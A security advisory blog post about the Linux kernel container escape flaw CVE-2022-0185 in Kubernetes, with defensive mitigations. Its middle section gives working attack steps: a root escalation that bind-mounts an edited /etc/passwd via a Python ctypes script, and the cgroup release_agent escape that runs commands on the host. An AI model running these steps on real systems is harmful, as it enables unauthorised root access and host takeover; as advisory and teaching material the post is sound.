High risk! New Kubernetes container escape vulnerability warning

Author: Michelangelo, KubeSphere evangelist and cloud native addict

On January 18, 2022, Linux maintainers and vendors discovered a heap buffer overflow vulnerability, CVE-2022-0185, in the legacy_parse_param function of the Linux kernel's filesystem context code (5.1-rc1 and later). It is a high-risk vulnerability with a severity score of 7.8.

The vulnerability allows out-of-bounds writes in kernel memory. By exploiting it, an unprivileged attacker can bypass any Linux namespace restrictions and escalate their privileges to root. For example, an attacker who has compromised one of your containers can escape from the container and escalate privileges on the host.

The vulnerability was introduced in Linux kernel 5.1-rc1 in March 2019. A patch released on January 18 fixes the problem, and all Linux users are advised to download and install the latest version of the kernel.

Vulnerability Details

The vulnerability is caused by an integer underflow in the legacy_parse_param function of the filesystem context code (fs/fs_context.c). The filesystem context is used to create the superblock when mounting and remounting a filesystem. The superblock records the characteristics of a filesystem, such as block and file sizes, as well as its storage blocks.

By sending more than 4095 bytes of input to the legacy_parse_param function, the input length check can be bypassed, resulting in an out-of-bounds write that triggers the vulnerability. An attacker could exploit this to write malicious data to other parts of kernel memory, crash the system, or execute arbitrary code to escalate privileges.
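To make the bypass concrete, the sketch below models the length check in Python. It is a simplified model based on public write-ups of CVE-2022-0185, not the kernel source: the form of the check, and the names PAGE_SIZE, remaining_space, and check_rejects, are assumptions made for illustration. The point is that the remaining space is computed with unsigned arithmetic, so once 4095 bytes are already buffered the result wraps around to a huge value instead of going negative.

```python
# Simplified model of the legacy_parse_param bounds check.
# Assumption: the check has the form `len > PAGE_SIZE - 2 - size`,
# evaluated in unsigned 64-bit arithmetic.
PAGE_SIZE = 4096
U64_MASK = (1 << 64) - 1


def remaining_space(size: int) -> int:
    """Space the check believes is left, with unsigned wraparound."""
    return (PAGE_SIZE - 2 - size) & U64_MASK


def check_rejects(size: int, length: int) -> bool:
    """Return True if the modelled check would reject `length` more bytes."""
    return length > remaining_space(size)


if __name__ == "__main__":
    # `size` is the number of bytes already buffered in the page.
    for size in (0, 4000, 4094, 4095, 4096):
        print(size, remaining_space(size), check_rejects(size, 100))
```

With 4000 bytes buffered, a further 100 bytes are rejected as expected. With 4095 bytes buffered, the subtraction wraps and the same 100 bytes are accepted, which is where the out-of-bounds write comes from.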

The input data for the legacy_parse_param function is added via the fsconfig system call, which configures the filesystem's creation context (such as the superblock for ext4 filesystems).

// Use the fsconfig system call to add the NUL-terminated string pointed to by val
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

To use the fsconfig system call in this way, a user must hold at least the CAP_SYS_ADMIN capability in their current namespace. This means that if a user can enter another namespace in which they hold this capability, that is sufficient to exploit the vulnerability.

If an unprivileged user does not already hold CAP_SYS_ADMIN, an attacker can obtain it through the unshare(CLONE_NEWNS|CLONE_NEWUSER) system call. The unshare system call lets the user create a new namespace in which they have the permissions needed for further attacks. This technique matters a great deal in the Kubernetes and container worlds, which use Linux namespaces to isolate Pods, and attackers can fully exploit it in a container escape attack. Once successful, an attacker gains full control of the host OS and of all containers running on it, can go on to attack other machines in the internal network segment, and can even deploy malicious containers in the Kubernetes cluster.

The research team that discovered the vulnerability published the exploit code and a proof of concept on GitHub on January 25.

PoC

Docker and other container runtimes apply a Seccomp profile by default, which prevents processes in the container from using dangerous system calls and so protects Linux namespace boundaries.

Seccomp (short for secure computing mode) was introduced into the Linux kernel in version 2.6.12 (March 8, 2005). In its original mode it limited the system calls available to a process to four: read, write, _exit, and sigreturn. This was a whitelist mode: the process could only use its already-open file descriptors and the four allowed system calls, and the kernel would terminate it with SIGKILL or SIGSYS if it attempted any other system call.

However, Kubernetes by default does not use any Seccomp or AppArmor/SELinux profiles to restrict the system calls of Pods, which is very dangerous. Processes in Pods can freely use dangerous system calls and wait for a chance to gain the necessary privileges (such as CAP_SYS_ADMIN) for further attacks.
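One way to see the difference from inside a container is to look at the Seccomp field of /proc/<pid>/status, which reports 0 (disabled), 1 (strict), or 2 (filter). The following is a minimal sketch; the function name seccomp_mode is made up for this example, and the script only reads the status file of the current process.

```python
# Report the seccomp mode of a process by parsing /proc/<pid>/status.
SECCOMP_MODES = {0: "disabled", 1: "strict", 2: "filter"}


def seccomp_mode(status_text: str) -> str:
    """Return the seccomp mode named in the text of a /proc/<pid>/status file."""
    for line in status_text.splitlines():
        # Match "Seccomp:" exactly; newer kernels also print "Seccomp_filters:".
        if line.startswith("Seccomp:"):
            value = int(line.split(":", 1)[1].strip())
            return SECCOMP_MODES.get(value, f"unknown ({value})")
    return "not reported"


if __name__ == "__main__":
    try:
        with open("/proc/self/status") as status_file:
            print("seccomp:", seccomp_mode(status_file.read()))
    except OSError as exc:
        print("could not read /proc/self/status:", exc)
```

Run inside a container with a Seccomp profile applied, this should report "filter"; in a Pod without any profile it should report "disabled".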

Let's start with a Docker example. In a standard Docker environment, the unshare command does not work, because Docker's Seccomp filter blocks the system call it uses.

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

Now let's take a look at a Kubernetes Pod:

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3   1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

As you can see, the root user in the Pod does not have the CAP_SYS_ADMIN capability, but we can obtain it in a new user namespace through the unshare command.

root@test:/# unshare -Urm
#
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh
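The check that pscap performs can also be done by hand, since the kernel exposes each process's effective capability set as a hexadecimal bitmask in the CapEff line of /proc/<pid>/status. The sketch below decodes that mask; the helper name has_cap is made up for this example, and CAP_SYS_ADMIN is bit 21 in <linux/capability.h>.

```python
# Check whether a process holds CAP_SYS_ADMIN by decoding the CapEff bitmask.
CAP_SYS_ADMIN = 21  # bit index from <linux/capability.h>


def has_cap(status_text: str, cap_bit: int = CAP_SYS_ADMIN) -> bool:
    """Return True if the CapEff mask in a /proc/<pid>/status text has cap_bit set."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            mask = int(line.split(":", 1)[1].strip(), 16)
            return bool(mask & (1 << cap_bit))
    return False  # no CapEff line found


if __name__ == "__main__":
    try:
        with open("/proc/self/status") as status_file:
            print("CAP_SYS_ADMIN:", has_cap(status_file.read()))
    except OSError as exc:
        print("could not read /proc/self/status:", exc)
```

The mask 00000000a80425fb corresponds to the fourteen capabilities listed for bash above and does not include bit 21, whereas a "full" set such as 000001ffffffffff does.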

So what can you do with CAP_SYS_ADMIN? Here are two examples showing how CAP_SYS_ADMIN can be used to infiltrate a system.

Escalating an ordinary user to root!

The following steps escalate an ordinary user on the host directly to root.

First give python3 the CAP_SYS_ADMIN capability (note that setcap cannot operate on symbolic links, only on the real file).

$ which python3
/usr/bin/python3

$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*

$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

Create a regular user.

$ useradd test -d /home/test -m

Then switch to the normal user and enter the user's home directory.

$ su test
$ cd ~

Copy /etc/passwd to the current directory and change the root user's password to "password".

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/

# Change root:x on the first line to root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Bind-mount the modified passwd file over /etc/passwd.

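$ cat mount-passwd.py
import ctypes
import os

# Load libc with errno support so a failed mount() can be reported
libc = ctypes.CDLL("libc.so.6", use_errno=True)
libc.mount.argtypes = (ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_ulong, ctypes.c_char_p)
MS_BIND = 4096  # bind-mount flag from <sys/mount.h>
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
# mount() returns 0 on success and -1 on failure
if libc.mount(source, target, filesystemtype, mountflags, options) != 0:
    err = ctypes.get_errno()
    raise OSError(err, os.strerror(err))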

$ python3 mount-passwd.py

Finally, the moment to witness the miracle! Switch directly to the root user and enter the password "password".

$ su root
Password: 
root@coredns:/home/test#

Amazing, we have switched to the root user...

Let's see if we really have root privileges:

$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

Yes, we really are root.

Finally, remember to unmount /etc/passwd.

$ umount /etc/passwd

So, system reboot engineers, hurry up and check whether the ordinary users you have handed out to others hold the CAP_SYS_ADMIN capability.

Viewing all host processes from inside a container!

Now let's look at a container example. The following steps let you list all the processes running on the host from inside a container.

We won't use the --privileged flag to run a privileged container; that would be boring.

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

Next, execute the following commands in the container. The net effect is to run the ps aux command on the host and save its output to the /output file in the container.

# Mounts the RDMA cgroup controller and creates a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# it's because your setup doesn't have the RDMA cgroup controller; try changing rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

In the end, you can see all the processes running on the host from inside the container:

root@0c84f7587629:/# cat /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]
......

I will not explain these commands in detail here. Those who are interested can study them on their own.
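As one small starting point for that study, the host_path step can be sketched in Python. The sed expression in the script pulls the upperdir option out of the container's overlay mount entry in /etc/mtab, which is the directory on the host that backs the container's root filesystem. The function name overlay_upperdir and the sample paths in the demo are made up for this example.

```python
import re


def overlay_upperdir(mtab_text: str):
    """Return the upperdir option of the first overlay mount, or None if absent."""
    for line in mtab_text.splitlines():
        fields = line.split()
        # mtab fields: device, mount point, filesystem type, options, dump, pass
        if len(fields) >= 4 and fields[2] == "overlay":
            match = re.search(r"upperdir=([^,]*)", fields[3])
            if match:
                return match.group(1)
    return None


if __name__ == "__main__":
    # Hypothetical mtab entry; real paths differ per host and per container.
    sample = (
        "overlay / overlay rw,relatime,"
        "lowerdir=/var/lib/docker/overlay2/l/AAA,"
        "upperdir=/var/lib/docker/overlay2/abc/diff,"
        "workdir=/var/lib/docker/overlay2/abc/work 0 0\n"
    )
    print(overlay_upperdir(sample))
```

Unlike the sed one-liner, which prints a match for every line that contains the option, this version stops at the first overlay entry.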

What is certain is that the CAP_SYS_ADMIN capability opens up more possibilities for attackers, whether on the host or in a container, and especially in container environments. If for reasons beyond our control we cannot upgrade the kernel, we must look for other solutions.

Solution

Container level

Since v1.22, Kubernetes can apply a default Seccomp profile to workloads such as Pods, Deployments, StatefulSets, and DaemonSets. While this feature is currently in Alpha, users can already add their own Seccomp or AppArmor profile and define it in the SecurityContext. For example:

# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault

After creating the Pod, try to use unshare to get the CAP_SYS_ADMIN capability.

$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

The output shows that the unshare system call is blocked, so an attacker can no longer use it to obtain this capability.
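To find workloads that still lack this protection, a manifest can be inspected for the seccompProfile field. The sketch below works on a Pod object that has already been parsed into a Python dict, for example from the output of kubectl get pod <name> -o json. The function names are made up for this example, and it only looks at the regular containers of a single Pod, so treat it as a starting point rather than a complete audit.

```python
def _seccomp_type(security_context):
    """Return the seccompProfile type from a securityContext dict, or None."""
    profile = (security_context or {}).get("seccompProfile") or {}
    return profile.get("type")


def containers_without_seccomp(pod: dict) -> list:
    """Return the names of containers with no effective Seccomp profile."""
    spec = pod.get("spec") or {}
    pod_level = _seccomp_type(spec.get("securityContext"))
    unprotected = []
    for container in spec.get("containers") or []:
        # A container-level profile overrides the Pod-level one.
        effective = _seccomp_type(container.get("securityContext")) or pod_level
        if effective in (None, "Unconfined"):
            unprotected.append(container.get("name", "<unnamed>"))
    return unprotected


if __name__ == "__main__":
    # The "protected" Pod from this article, written as a dict.
    pod = {
        "spec": {
            "containers": [
                {
                    "name": "protected",
                    "image": "ubuntu",
                    "securityContext": {"seccompProfile": {"type": "RuntimeDefault"}},
                }
            ]
        }
    }
    print(containers_without_seccomp(pod))
```

Note that this reads only what the manifest says. If a default profile is enforced some other way, a container reported here may still be protected at runtime.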

Host level

Another solution is to disable the use of user namespaces by unprivileged users at the host level, which does not require restarting the system. For example, on Ubuntu, the following two lines take effect immediately and also persist after the system is restarted.

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

On a Red Hat system, you can execute the following commands to achieve the same effect.

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
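After applying either setting, it can be read back from /proc/sys to confirm that it took effect. The following is a minimal sketch that checks both sysctls named above; the function names are made up for this example, and a value of None simply means that the sysctl does not exist on the running kernel.

```python
from pathlib import Path

# The two sysctls used above, as paths relative to /proc/sys.
SYSCTLS = ("kernel/unprivileged_userns_clone", "user/max_user_namespaces")


def userns_settings(proc_sys: str = "/proc/sys") -> dict:
    """Read the user namespace sysctls; None means the sysctl is not present."""
    result = {}
    for name in SYSCTLS:
        try:
            result[name] = int((Path(proc_sys) / name).read_text().strip())
        except (OSError, ValueError):
            result[name] = None
    return result


def unprivileged_userns_disabled(settings: dict) -> bool:
    """Return True if either sysctl is set to 0."""
    return any(settings.get(name) == 0 for name in SYSCTLS)


if __name__ == "__main__":
    current = userns_settings()
    print(current)
    print("unprivileged user namespaces disabled:", unprivileged_userns_disabled(current))
```

The proc_sys parameter exists only so the function can be pointed at a different directory for testing.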

To summarize, here are the suggestions for dealing with this vulnerability:

If your environment can tolerate patching the kernel and rebooting the system, it is best to patch or upgrade the kernel.
Reduce the use of privileged containers with access to CAP_SYS_ADMIN.
For unprivileged containers, make sure a Seccomp filter blocks their calls to unshare to reduce risk. Docker does this by default; Kubernetes needs extra action.
In the future, a default Seccomp profile can be enabled for all workloads in a Kubernetes cluster. At present this feature is still in the Alpha stage and must be turned on through a feature gate.
Disable the use of user namespaces by unprivileged users at the host level.

Final thoughts

Container environments are complex, especially on a distributed scheduling platform like Kubernetes. Each component has its own life cycle and attack surface, which makes it easy to expose security risks. Container cluster administrators must pay attention to security in every detail. In most cases the security of containers depends on the security of the Linux kernel, so we need to keep an eye on any kernel security issues and apply the corresponding fixes as soon as possible.
